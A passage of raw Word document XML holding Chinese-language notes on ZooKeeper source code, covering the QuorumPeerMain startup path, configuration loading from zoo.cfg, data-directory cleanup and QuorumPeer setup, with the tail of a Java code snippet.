        </w:rPr>
        <w:t>:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>            LOG.error(</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>"Received an invalid flag value to convert to a CreateMode"</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>throw</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> KeeperException.BadArgumentsException();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>        }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00167AFF" w:rsidRDefault="00332EAE" w:rsidP="00332EAE">
      <w:r w:rsidRPr="00332EAE">
        <w:t>http://www.jiacheo.org/blog/122</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6295" w:rsidRPr="00F41A4C" w:rsidRDefault="008D6295" w:rsidP="008D6295">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009F70F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源码分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009032D8" w:rsidRDefault="00127D53" w:rsidP="009032D8">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00235030">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>QuorumPeerMain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6295" w:rsidRDefault="00235030" w:rsidP="009032D8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>入口函数，读取配置文件信息</w:t>
      </w:r>
      <w:r w:rsidR="00E76285">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00D4470B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Zookeeper</w:t>
      </w:r>
      <w:r w:rsidR="00D4470B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>集群启动的入口类是</w:t>
      </w:r>
      <w:r w:rsidR="00D4470B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>QuorumPeerMain</w:t>
      </w:r>
      <w:r w:rsidR="00D4470B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>来加载配置启动</w:t>
      </w:r>
      <w:r w:rsidR="00D4470B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>QuorumPeer</w:t>
      </w:r>
      <w:r w:rsidR="00D4470B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidR="00847CF6">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00764122" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Quorum</w:t>
      </w:r>
      <w:r w:rsidR="00847CF6" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>每个</w:t>
      </w:r>
      <w:r w:rsidR="00847CF6" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>zookeeper</w:t>
      </w:r>
      <w:r w:rsidR="00847CF6" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>集群启动的时候集群中</w:t>
      </w:r>
      <w:r w:rsidR="00847CF6" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>zookeeper</w:t>
      </w:r>
      <w:r w:rsidR="00847CF6" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>服务数量就已经确定了</w:t>
      </w:r>
      <w:r w:rsidR="009F586F" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="009F586F" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>peer</w:t>
      </w:r>
      <w:r w:rsidR="009F586F" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>代表就是集中每个</w:t>
      </w:r>
      <w:r w:rsidR="009F586F" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>zookeeper</w:t>
      </w:r>
      <w:r w:rsidR="009F586F" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>角色是对等的没有主从之分，每个</w:t>
      </w:r>
      <w:r w:rsidR="009F586F" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>zookeeper</w:t>
      </w:r>
      <w:r w:rsidR="009F586F" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>服务都可以成为</w:t>
      </w:r>
      <w:r w:rsidR="009F586F" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="009F586F" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009F586F" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> follower</w:t>
      </w:r>
      <w:r w:rsidR="009F586F" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009F586F" w:rsidRPr="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>observer</w:t>
      </w:r>
      <w:r w:rsidR="009F586F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C7C44" w:rsidRPr="005C7C44" w:rsidRDefault="005C7C44" w:rsidP="005C7C44">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7C44">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>QuorumPeerConfig</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7C44">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>读取配置文件，如下面的</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7C44">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>zoo.cfg</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7C44">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00127D53" w:rsidRPr="00127D53" w:rsidRDefault="005C7C44" w:rsidP="00127D53">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>启动定时清理服务任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">DatadirCleanupManager.start() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>用来清除过期的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>txtLog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>snapshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00127D53" w:rsidRPr="00127D53" w:rsidRDefault="005C7C44" w:rsidP="00127D53">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>构建</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>QuorumPeer</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>任务对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>）设置供客户端连接的端口地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>）设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>txtLog</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>snapshot</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的操作对象</w:t>
      </w:r>
      <w:r w:rsidR="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>FileTxnSnaplog</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>3.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>）设置本</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="008F318F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>myid(sid)</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>）设置客户端连接工厂</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>3.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>）设置选举算法</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>3.6</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>）各种时间设置等等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C7C44" w:rsidRPr="00127D53" w:rsidRDefault="005C7C44" w:rsidP="00127D53">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
